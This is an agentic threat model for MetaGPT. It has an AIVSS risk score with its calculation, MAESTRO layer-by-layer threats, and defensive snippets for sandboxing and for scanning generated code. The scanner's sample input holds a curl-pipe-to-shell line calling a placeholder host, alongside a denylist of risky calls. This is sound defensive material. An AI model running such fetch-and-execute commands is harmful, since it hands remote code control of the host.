MetaGPT — agentic threat model

AIVSS 9.7 · Critical

MetaGPT presents a high agentic risk profile due to its multi-agent collaboration and automated code generation capabilities, which can be exploited to execute unauthorized code or inject supply-chain vulnerabilities if deployed without strict sandboxing.

OWASP AIVSS score rationale

AIVSS = (CVSS_Base + AARS) × Mitigation_Factor, where AARS = (10 − CVSS_Base) × (Factor_Sum / 10) × ThM

CVSS base 8.5 · AARS uplift 1.17 · Factor sum 7.1/10 · Threat ×1.1 · Mitigation ×1.0

Autonomy of Action		0.80
Goal-Driven Planning		1.00
Self-Modification		0.30
Dynamic Tool Use		0.80
Persistent Memory		0.60
Contextual Awareness		0.80
Dynamic Identity		0.50
Multi-Agent Interactions		1.00
Non-Determinism		0.70
Opacity & Reflexivity		0.60

Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
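
As a check on the arithmetic, the formula and inputs listed above can be reproduced in a few lines. This is a minimal sketch that uses only the values shown in this section; the function and variable names are illustrative and do not come from any official AIVSS tooling.

```python
# Risk factor values exactly as listed in the table above.
FACTORS = {
    "Autonomy of Action": 0.80,
    "Goal-Driven Planning": 1.00,
    "Self-Modification": 0.30,
    "Dynamic Tool Use": 0.80,
    "Persistent Memory": 0.60,
    "Contextual Awareness": 0.80,
    "Dynamic Identity": 0.50,
    "Multi-Agent Interactions": 1.00,
    "Non-Determinism": 0.70,
    "Opacity & Reflexivity": 0.60,
}


def aivss_score(cvss_base, factors, threat_multiplier, mitigation_factor):
    """Apply AIVSS = (CVSS_Base + AARS) x Mitigation_Factor as quoted above."""
    factor_sum = sum(factors.values())
    # AARS = (10 - CVSS_Base) x (Factor_Sum / 10) x ThM
    aars = (10 - cvss_base) * (factor_sum / 10) * threat_multiplier
    score = (cvss_base + aars) * mitigation_factor
    return factor_sum, aars, score


factor_sum, aars, score = aivss_score(
    cvss_base=8.5, factors=FACTORS, threat_multiplier=1.1, mitigation_factor=1.0
)
print(f"Factor sum  = {factor_sum:.1f}")
print(f"AARS uplift = {aars:.2f}")
print(f"AIVSS       = {score:.1f}")
```

With these inputs the uplift is 1.5 × 0.71 × 1.1 ≈ 1.17, and (8.5 + 1.17) × 1.0 rounds to the 9.7 shown at the top.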

MAESTRO 7-layer threat model

Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.

L1 · Foundation Models ⚠ not certain from listing

Not certain from the listing: MetaGPT relies on external foundation LLMs, which are inherently susceptible to prompt injection and adversarial reprogramming and can generate insecure or malicious code snippets.

L2 · Data Operations ⚠ not certain from listing

Not certain from the listing: MetaGPT handles sensitive software design documents, SOPs, and source code. Insecure data handling could lead to exfiltration of the codebase or poisoning of the context used by the agents.

L3 · Agent Frameworks ✓ mapped

MetaGPT's core framework orchestrates complex agent workflows. Vulnerabilities here include insecure tool execution (e.g., running generated code or compilers) and prompt injection that bypasses the defined SOP constraints.

L4 · Deployment & Infrastructure ⚠ not certain from listing

Not certain from the listing: because MetaGPT is an open-source framework, deployment is managed by the user. Running it without strict containerization or sandboxing poses a severe risk of host compromise when generated code is executed automatically.
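
One way to picture the containerization this layer calls for is a locked-down `docker run` invocation around whatever generated code is about to be executed. The sketch below only builds the command line and does not run it. The helper name, image, workspace path, script name, and resource limits are all assumptions made for illustration, and none of this is part of MetaGPT's own API.

```python
import shlex


def build_sandbox_command(workspace_dir, image="python:3.12-slim", script="main.py"):
    """Build a `docker run` argv for executing generated code with reduced privileges.

    Hypothetical helper: the image, script name, and limits are illustrative defaults.
    """
    return [
        "docker", "run", "--rm",
        "--network", "none",                    # no outbound network access
        "--read-only",                          # read-only root filesystem
        "--cap-drop", "ALL",                    # drop all Linux capabilities
        "--security-opt", "no-new-privileges",  # block privilege escalation via setuid
        "--pids-limit", "128",                  # cap process count (fork bombs)
        "--memory", "512m",                     # cap memory
        "--cpus", "1",                          # cap CPU
        "--user", "65534:65534",                # run as an unprivileged uid:gid
        "--tmpfs", "/tmp",                      # scratch space that is not persisted
        "-v", f"{workspace_dir}:/workspace:ro", # generated code mounted read-only
        "-w", "/workspace",
        image,
        "python", script,
    ]


cmd = build_sandbox_command("/srv/metagpt/workspace")
print(shlex.join(cmd))
```

Passing the list to `subprocess.run(cmd, timeout=...)` would add a wall-clock limit. A container on its own is not a complete security boundary, so stricter isolation (for example a dedicated VM) may still be appropriate for untrusted workloads.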

L5 · Evaluation & Observability ⚠ not certain from listing

Not certain from the listing: the public description does not specify built-in guardrails, real-time monitoring, or anomaly detection that would identify when agents deviate from their SOPs or generate malicious payloads.
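
Where no such guardrail exists, a deployer could add a pre-execution check of their own. The following is a rough sketch of one possible check: it parses generated Python with the standard `ast` module and reports calls that appear on a small denylist. The denylist contents and function names are assumptions chosen for illustration. A static denylist is easy to evade, so this complements sandboxing rather than replacing it.

```python
import ast

# Hypothetical denylist; a real policy would be broader and tuned to the project.
RISKY_CALLS = {
    "eval", "exec", "compile", "__import__",
    "os.system", "os.popen",
    "subprocess.run", "subprocess.call", "subprocess.Popen",
}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_risky_calls(source):
    """Return sorted (line number, call name) pairs for denylisted calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


# Example input standing in for agent-generated code.
generated = '''import os
def build():
    os.system("curl http://example.invalid | sh")
    return eval("1 + 1")
'''

for lineno, name in find_risky_calls(generated):
    print(f"line {lineno}: {name}")
```

For the sample input this flags `os.system` on line 3 and `eval` on line 4. Findings like these could be logged or used to block execution pending review.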

L6 · Security & Compliance (cross-cutting) ⚠ not certain from listing

Not certain from the listing: the public description does not mention native enterprise security controls, access policies, or compliance auditing, so organizations should expect to wrap the framework in their own security boundaries.

L7 · Agent Ecosystem ✓ mapped

Highly relevant. MetaGPT relies heavily on multi-agent interactions. A compromise in one agent (e.g., the Product Manager or Architect) can propagate through the trust that downstream agents place in its output, causing cascading failures or malicious code injection across the entire agent chain.
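
The cascading effect can be illustrated with a toy reachability check over a hand-off graph. The pipeline below is a simplified, assumed ordering of roles. Only the Product Manager and Architect are named in this listing, and the remaining role names and edges are hypothetical. Every role reachable from the compromised one consumes tainted output, directly or indirectly.

```python
from collections import deque

# Hypothetical hand-off graph: each role passes its output to the roles listed.
PIPELINE = {
    "ProductManager": ["Architect"],
    "Architect": ["ProjectManager"],
    "ProjectManager": ["Engineer"],
    "Engineer": ["QAEngineer"],
    "QAEngineer": [],
}


def tainted_roles(compromised, graph):
    """Breadth-first walk returning the compromised role and everything downstream."""
    seen = {compromised}
    order = [compromised]
    queue = deque([compromised])
    while queue:
        role = queue.popleft()
        for consumer in graph.get(role, []):
            if consumer not in seen:
                seen.add(consumer)
                order.append(consumer)
                queue.append(consumer)
    return order


for start in ("ProductManager", "Architect"):
    print(f"{start} compromised -> tainted: {', '.join(tainted_roles(start, PIPELINE))}")
```

In this linear sketch, a compromise at the first role taints every later stage. That is why validating artifacts at each hand-off, rather than only at the end, limits how far a compromise spreads.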

MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).